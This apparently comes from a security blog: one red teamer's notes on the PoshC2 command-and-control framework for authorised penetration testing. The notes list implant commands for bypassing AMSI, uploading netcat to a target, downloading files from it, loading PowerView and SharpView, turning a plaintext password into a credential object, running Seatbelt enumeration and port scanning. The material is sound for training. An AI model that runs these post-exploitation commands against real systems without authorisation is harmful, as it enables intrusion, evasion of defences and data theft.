Yaksas Security

Cyber Security Research

  • Yaksas Security Home
  • Home
  • Yaksas Security Classroom
  • Learn Adversary Emulation
  • Contact Yaksas
PoshC2: A Red Teamer’s Notes

Uday Mittal July 8, 2020 Leave a Comment

PoshC2: A Red Teamer’s Notes

This is an ongoing post containing my notes on PoshC2 usage.

What is PoshC2?

PoshC2 is a command and control software. It is used to carry out post-exploitation tasks such as persistence, privilege escalation, lateral movements etc. during penetration testing and red teaming exercises. It supports Python3, PowerShell (v2 and v5), C# and C++. The official documentation is available here.

All of PoshC2 functionality can be divided into five components:

PoshC2 Server – Serves payloads that can be executed on target machine(s) and send a connection back to PoshC2. The server console also displays the output of command(s) executed on an implant. The server is written in Python.

Implants Receiver – Listens for the incoming implant connections and aggregates them. It is also used to load modules and execute commands on a single, multiple or all implants.

Payloads – Commands, shellcode, executable binaries that when executed on target machine(s) (aka implants) sends back a connection to Implant receiver. Payloads are developed using C#, Python, PowerShell, JavaScript, VBScript and support Windows, Linux (Python) and MacOS (Python).

Implants – Target machine(s) connected to PoshC2.

Modules – Scripts (PowerShell and Python) and executable binaries (C#) that help in conducting various post-exploitation tasks such as enumeration, privilege escalation, lateral movement, hash dump, port forwarding etc. A comprehensive list of modules is available here.

How to use?

The following video shows how to get PoshC2 up and running quickly. It covers:

  • Installation on Kali Linux 2020.2
  • Configuring PoshC2
  • Running Posh-server and implants receiver
  • Managing implants
  • Modules
  • Loading C# and PowerShell modules on an Implant
  • Running commands on an implant

Read this to learn more about the lab environment used in this video.

Useful Commands (C# Implants)

Selecting Implant(s)

  • To select a single implant, enter the ImplantID
  • To select multiple implants, enter a comma separated list of ImplantIDs
  • To select all implants, enter ALL

Quick Reference List of Commands

Issue the following command when connected to an implant(s)

help

Bypass AMSI

bypass-amsi

Upload files

upload-file <source file path> <destination file path>
Example: upload-file /usr/share/windows-binaries/nc.exe C:\Users\Public\nc.exe

Download files

download-file <file path>
Example: download-file 'C:\\Users\\Public\\supersecretdata.txt'

This will save a copy of the target file in the PoshC2 project directory.

List Modules

To list implant specific modules, select an implant and issue the following command:

  
listmodules 

To list all modules, issue the following command at implant selection prompt:

 
listmodules 

Load a C# Module

 loadmodule <module name>
Example: loadmodule SharpView.exe 

Load a PowerShell Module

 pslo <module name> 
Example: pslo powerview.ps1 

You can also use loadmoduleforce to load modules.

Execute a PowerShell Command

 sharpps <command> 
Example: sharpps Get-ChildItem -Force -Recurse 

Convert Username and Password to a PSCredentials object

sharpps [string]$userName = 'IND\user.ind02'
sharpps [string]$userPassword = '[email protected]'
sharpps [securestring]$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force
sharpps [pscredential]$credObject = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword)

After executing above commands, $credObject can be passed as a value to -Credential parameter in PowerShell commands which accept this parameter.

Enumerate an Implant


ls-recurse <directory path>
Example:  ls-recurse C:\Users
get-userinfo
get-computerinfo
loadmodule Seatbelt.exe
seatbelt all
sharpup

Port Scan

portscan <IP> <port> <delay-in-seconds> <max thread>
Example: portscan "192.168.3.8" "1-1000" 1 100

 

 

Related Posts

  • The Three Command and Control TiersThe Three Command and Control Tiers
  • Book Review: Practical Social EngineeringBook Review: Practical Social Engineering
mm
Uday Mittal

Uday Mittal is a cybersecurity professional with rich working experience working with various industries including telecom, publishing, consulting and finance. He holds internationally recognized certifications such as CRTP, OSCE, OSCP, CISSP, CISA, CISM, CRISC among others. He speaks on cybersecurity awareness, offensive security research etc. and has authored various articles on topics related to cyber security and software development for a leading magazine on open source software.

Filed Under: CnC Tagged With: command and control, poshc2, post-exploitation, red team

Optin Form

Search

Follow us on Twitter

My Tweets

Categories

Tags

(ISC)2 Active directory adsecurity adsi adsisearcher adversary emulation Android attack active directory awareness blue whale challenge Certification CISSP Cloud security crte crtp cyber-warfare cybersecurity Cyber Security Cybersecurity books domain enumeration ethical hacking forest enumeration hacker Information Security ISACA Kali Linux Mobile Security Narendra Modi NSA offensive security Online Safety opsec Password Penetration Testing pentest powersploit Powerview privacy red team red teaming Risk Management Social Engineering user enumeration Wifi Windows

Top Posts

  • ADSISearcher (Part 2)
    ADSISearcher (Part 2)
  • Social-Engineer Toolkit: An Introduction
    Social-Engineer Toolkit: An Introduction
  • Let there be no more MMS Scandals
    Let there be no more MMS Scandals
  • Make Remote Access Your Ally
    Make Remote Access Your Ally
  • 7 Ways to Cover Your Device's Camera
    7 Ways to Cover Your Device's Camera
  • Mona.py for exploit devs: 6 must know commands
    Mona.py for exploit devs: 6 must know commands

© Copyright 2020 ElliteDevs · All Rights Reserved · Powered by WordPress